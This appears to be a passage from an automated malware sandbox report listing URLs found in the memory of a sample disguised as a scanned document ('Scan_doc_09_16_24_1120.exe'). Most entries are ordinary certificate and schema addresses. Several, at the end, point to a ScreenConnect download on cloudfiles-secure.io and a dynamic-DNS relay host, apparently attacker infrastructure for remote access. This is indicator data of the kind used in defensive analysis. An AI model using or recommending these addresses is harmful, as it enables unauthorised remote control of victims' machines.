                  Source: svchost.exe, 00000007.00000002.3272552281.0000022265A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://Passport.NET/tb
                  Source: svchost.exe, 00000007.00000002.3272552281.0000022265A32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3271223902.0000022264AB2000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://Passport.NET/tb:pp
                  Source: svchost.exe, 00000007.00000002.3272552281.0000022265A32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2088814426.0000022265A36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272697084.0000022265A69000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://Passport.NET/tb_
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: Scan_doc_09_16_24_1120.exe, 00000000.00000002.2220205014.0000000000D5C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustXL9
                  Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: F2E248BEDDBB2D85122423C41028BFD40.1.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: dfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270845D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022708353000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022708459000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cloudfiles-secure.io
                  Source: svchost.exe, 00000006.00000002.3274283658.000001E585061000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3271223902.0000022264AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: Scan_doc_09_16_24_1120.exe, 00000000.00000002.2220205014.0000000000D5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256Time
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: Scan_doc_09_16_24_1120.exe, 00000000.00000002.2220205014.0000000000D5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: dfsvc.exe, 00000001.00000002.2793656432.0000022721BC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabB
                  Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: dfsvc.exe, 00000001.00000002.2793865046.0000022721C0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/eni
                  Source: svchost.exe, 00000007.00000003.2209823243.0000022265379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: svchost.exe, 00000007.00000002.3271914143.0000022265300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
                  Source: svchost.exe, 00000007.00000003.2190621904.0000022265378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2168950175.0000022265375000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes
                  Source: svchost.exe, 00000007.00000003.2156243757.0000022265375000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2190621904.0000022265378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272256168.0000022265378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2156320828.0000022265374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3271328739.0000022264ADF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165831029.0000022265376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2078695040.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2168950175.0000022265375000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2209823243.0000022265379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: svchost.exe, 00000007.00000002.3271914143.0000022265300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
                  Source: svchost.exe, 00000007.00000002.3272256168.0000022265378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.1.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000001.00000002.2792984032.0000022721B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000001.00000002.2791939557.0000022720588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                  Source: svchost.exe, 00000007.00000002.3272942590.0000022265A97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                  Source: svchost.exe, 00000007.00000003.2210637965.0000022264A7D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: svchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3271914143.0000022265300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                  Source: svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy1p
                  Source: svchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policyn
                  Source: svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc1e
                  Source: svchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scst
                  Source: svchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: svchost.exe, 00000007.00000002.3272552281.0000022265A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee
                  Source: svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee2
                  Source: svchost.exe, 00000007.00000002.3272552281.0000022265A32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2088814426.0000022265A36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: dfsvc.exe, 00000001.00000002.2784738148.0000022707C61000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3274199153.0000000001410000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.2941168266.00000000032F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                  Source: Scan_doc_09_16_24_1120.exe, 00000000.00000002.2220205014.0000000000D5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/
                  Source: Scan_doc_09_16_24_1120.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: dfsvc.exe, 00000001.00000002.2784738148.0000022708125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: dfsvc.exe, 00000001.00000002.2784738148.00000227081F6000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022708125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.000000000157A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.ora
                  Source: dfsvc.exe, 00000001.00000002.2784738148.0000022707CF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000001.00000002.2784738148.0000022707CF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                  Source: svchost.exe, 00000007.00000003.2056321735.000002226532C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270802647.0000022264A27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056592993.0000022265357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                  Source: dfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270845D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022708353000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2794636681.0000022723FB5000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270838D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io
                  Source: dfsvc.exe, 00000001.00000002.2784738148.000002270845D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect
                  Source: dfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Cli
                  Source: dfsvc.exe, 00000001.00000002.2793324674.0000022721B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.ap
                  Source: dfsvc.exe, 00000001.00000002.2793865046.0000022721C0A000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2792984032.0000022721B00000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2794699617.0000022724041000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284680562.00000000032FF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.000000000156C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2285819740.000000001BC56000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284680562.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284680562.00000000032F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application
                  Source: dfsvc.exe, 00000001.00000002.2784738148.00000227081F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.W0
                  Source: dfsvc.exe, 00000001.00000002.2784738148.00000227081F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.WPj
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284680562.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, CHT0VHXS.log.1.drString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applic
                  Source: dfsvc.exe, 00000001.00000002.2795014048.00000227240A9000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2793471358.0000022721B9A000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284190303.0000000001592000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2285641644.000000001BBDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application%%%
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2285819740.000000001BC56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application.
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.000000000156C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application22DW.YBK&
                  Source: dfsvc.exe, 00000001.00000002.2792984032.0000022721B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application5
                  Source: CHT0VHXS.log.1.drString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=ttyuio.zapto.o
                  Source: dfsvc.exe, 00000001.00000002.2791465766.00000227204E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationP
